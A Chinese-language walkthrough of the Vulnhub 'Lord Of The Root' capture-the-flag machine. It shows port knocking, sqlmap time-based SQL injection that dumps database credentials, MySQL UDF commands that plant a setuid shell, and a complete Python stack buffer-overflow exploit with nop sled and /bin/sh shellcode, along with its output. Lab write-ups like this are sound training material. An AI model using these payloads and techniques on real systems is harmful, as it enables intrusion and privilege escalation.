Lord Of The Root from Vulnhub
root@kali:~/_Sec/lord_of_root# nmap -p- -T5 192.168.0.119
Starting Nmap 6.47 ( http://nmap.org ) at 2015-12-26 08:30 EST
Nmap scan report for 192.168.0.119
Host is up (0.00068s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 00:0C:29:FA:7B:62 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 53.53 secondsnmap掃瞄過之後只有port 22是打開的,另外掃過UDP也沒有掃到開起的port
最後只好先連上port 22看看
root@kali:~/_Sec/lord_of_root# ssh 192.168.0.119
.____ _____________________________
| | \_____ \__ ___/\______ \
| | / | \| | | _/
| |___/ | \ | | | \
|_______ \_______ /____| |____|_ /
\/ \/ \/
____ __. __ ___________ .__ .___ ___________ ___________ __
| |/ _| ____ ____ ____ | | __ \_ _____/______|__| ____ ____ __| _/ \__ ___/___ \_ _____/ _____/ |_ ___________
| < / \ / _ \_/ ___\| |/ / | __) \_ __ \ |/ __ \ / \ / __ | | | / _ \ | __)_ / \ __\/ __ \_ __ \
| | \| | ( <_> ) \___| < | \ | | \/ \ ___/| | \/ /_/ | | |( <_> ) | \ | \ | \ ___/| | \/
|____|__ \___| /\____/ \___ >__|_ \ \___ / |__| |__|\___ >___| /\____ | |____| \____/ /_______ /___| /__| \___ >__|
\/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/
Easy as 1,2,3“Knock Friend To Enter” 看來第一關是port knocking
敲完門之後,nmap再掃一次就多了一個新的port
1337/tcp open http Apache httpd 2.4.7 ((Ubuntu))連上網站後,只有三張魔戒的meme
抓下來細看一下,裡面好像沒有藏甚麼資訊
接著想看一下robots.txt有沒有擋調特別的路徑,卻出現了下面的特出景象
而且原始碼內還有一個神祕的字串
<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>用base64解碼之後得到了
Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!再解一次之後得到
/978345210/index.php於是我們來到了魔鐸之門 (?
看到這麼陽春的登入畫面,推測應該是用SQL injection打無誤(?
簡單試過一些基本的SQLi語句卻都沒有效果
只好求助sqlmap大神
root@kali:~/_Sec/lord_of_root# sqlmap --url='http://192.168.0.121:1337/978345210/index.php' --data="username=asd&password=asd&submit= Login" --dump-all --level 5
...
[11:40:29] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:41:19] [INFO] POST parameter 'username' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
...
[11:41:21] [INFO] checking if the injection point on POST parameter 'username' is a false positive
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 2094 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: username=asd'||(SELECT 'NAyM' FROM DUAL WHERE 8495=8495 AND SLEEP(5) )||'&password=asd&submit= Login
---
[11:46:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.11[12:09:03] [INFO] starting dictionary-based cracking (mysql_passwd)
[12:09:13] [INFO] cracked password 'darkshadow' for user 'root'
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *A55A9B9049F69BC2768C9284615361DFBD580B34
[*] root [1]:
password hash: *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F
clear-text password: darkshadow[09:50:20] [INFO] fetching columns for table 'Users' in database 'Webapp'
...
+----+----------+------------------+
| id | username | password |
+----+----------+------------------+
| 1 | frodo | iwilltakethering |
| 2 | smeagol | MyPreciousR00t |
| 3 | aragorn | AndMySword |
| 4 | legolas | AndMyBow |
| 5 | gimli | AndMyAxe |
+----+----------+------------------+成功把資料庫dump出來
裡面有一張表看起來有點用處的帳號+密碼組合
還得到了mysql內root的密碼為darkshadow
拿這些帳號密碼去嘗試登入ssh,最後成功使用smeagol登入
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)
* Documentation: https://help.ubuntu.com/
261 packages can be updated.
128 updates are security updates.
.____ _____________________________
| | \_____ \__ ___/\______ \
| | / | \| | | _/
| |___/ | \ | | | \
|_______ \_______ /____| |____|_ /
\/ \/ \/
__ __ .__ ___________ .__ .___
/ \ / \ ____ | | ____ ____ _____ ____ \_ _____/______|__| ____ ____ __| _/
\ \/\/ // __ \| | _/ ___\/ _ \ / \_/ __ \ | __) \_ __ \ |/ __ \ / \ / __ |
\ /\ ___/| |_\ \__( <_> ) Y Y \ ___/ | \ | | \/ \ ___/| | \/ /_/ |
\__/\ / \___ >____/\___ >____/|__|_| /\___ > \___ / |__| |__|\___ >___| /\____ |
\/ \/ \/ \/ \/ \/ \/ \/ \/
Last login: Tue Sep 22 12:59:38 2015 from 192.168.55.135
smeagol@LordOfTheRoot:~$再來登入mysql,試試看之前看過的MySQL UDF Exploit有沒有效果
mysql> select do_system('cp /bin/sh /home/smeagol/bash');
+------------------------------------------+
| do_system('cp /bin/sh /home/smeagol/bash') |
+------------------------------------------+
| 0 |
+------------------------------------------+
1 row in set (0.01 sec)
mysql> select do_system('chmod 4777 /home/smeagol/bash');
+------------------------------------------+
| do_system('chmod 4777 /home/smeagol/bash') |
+------------------------------------------+
| 0 |
+------------------------------------------+接著來看看成果
smeagol@LordOfTheRoot:~$ ls -al
...
-rwsrwxrwx 1 root root 112204 Dec 26 16:43 bash
...
smeagol@LordOfTheRoot:~$ ./sh
bash-4.3$ id
uid=1000(smeagol) gid=1000(smeagol) euid=0(root) groups=0(root),1000(smeagol)
bash-4.3$ cat /root/Flag.txt
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf成功拿下魔戒的root!不過總覺得用這個方法拿到root有點太過輕鬆
於是簡單地檢查了一下,最後找到了三支奇怪的程式
smeagol@LordOfTheRoot:~$ for i in $(find / -perm -4000 2>/dev/null); do ls -al $i; done
...
-rwsr-xr-x 1 root root 5150 Sep 22 13:01 /SECRET/door2/file
-rwsr-xr-x 1 root root 7370 Sep 17 23:08 /SECRET/door1/file
-rwsr-xr-x 1 root root 7370 Sep 17 23:08 /SECRET/door3/file而且這命名看起來才飽含了作者對魔戒的愛,從這邊拿下root應該才是作者所希望的解法。
這三個file檔分別放在door1, door2, door3三個目錄下
其中兩支看起來似乎是同一支程式,而且執行之後沒做甚麼事情就結束了
剩下的一支可以傳入參數達到Buffer Overflow的效果
root@kali:~/_Sec/lord_of_root/door3# objdump -D file | grep -A30 main.:
0804845d <main>:
804845d: 55 push %ebp
804845e: 89 e5 mov %esp,%ebp
8048460: 83 e4 f0 and $0xfffffff0,%esp
8048463: 81 ec b0 00 00 00 sub $0xb0,%esp
8048469: 83 7d 08 01 cmpl $0x1,0x8(%ebp)
804846d: 7f 21 jg 8048490 <main+0x33>
804846f: 8b 45 0c mov 0xc(%ebp),%eax
8048472: 8b 00 mov (%eax),%eax
8048474: 89 44 24 04 mov %eax,0x4(%esp)
8048478: c7 04 24 40 85 04 08 movl $0x8048540,(%esp)
804847f: e8 8c fe ff ff call 8048310 <printf@plt>
8048484: c7 04 24 00 00 00 00 movl $0x0,(%esp)
804848b: e8 b0 fe ff ff call 8048340 <exit@plt>
8048490: 8b 45 0c mov 0xc(%ebp),%eax
8048493: 83 c0 04 add $0x4,%eax
8048496: 8b 00 mov (%eax),%eax
8048498: 89 44 24 04 mov %eax,0x4(%esp)
804849c: 8d 44 24 11 lea 0x11(%esp),%eax
80484a0: 89 04 24 mov %eax,(%esp)
80484a3: e8 78 fe ff ff call 8048320 <strcpy@plt>
80484a8: b8 00 00 00 00 mov $0x0,%eax
80484ad: c9 leave
80484ae: c3 ret接著用pattern_create.rb和pattern_offset.rb找出EIP的注入點
root@kali:~/_Sec/lord_of_root/door3# /usr/share/metasploit-framework/tools/pattern_offset.rb 0x41376641
[*] Exact match at offset 171再來先檢查目標端的ASLR有沒有開啟
smeagol@LordOfTheRoot:/SECRET/door3$ cat /proc/sys/kernel/randomize_va_space
2ASLR是開著的,看來要靠nop-sled拼人品了
#!/usr/bin/python
import os
import struct
nopsled = 20000
payload = "A"*171 # trash
payload+= "\x50\x2e\xb0\xbf" # EIP
payload+= "\x90"*nopsled # nop sled
payload+= "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" #shellcode
while True:
for i in range (1, 4):
cmd = "/SECRET/door%d/file %s" % (i, payload)
os.system (cmd)拿了一份會執行/bin/sh的 shellcode,把payload拼完之後就是賭人品的時刻了
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
# id
uid=1000(smeagol) gid=1000(smeagol) euid=0(root) groups=0(root),1000(smeagol)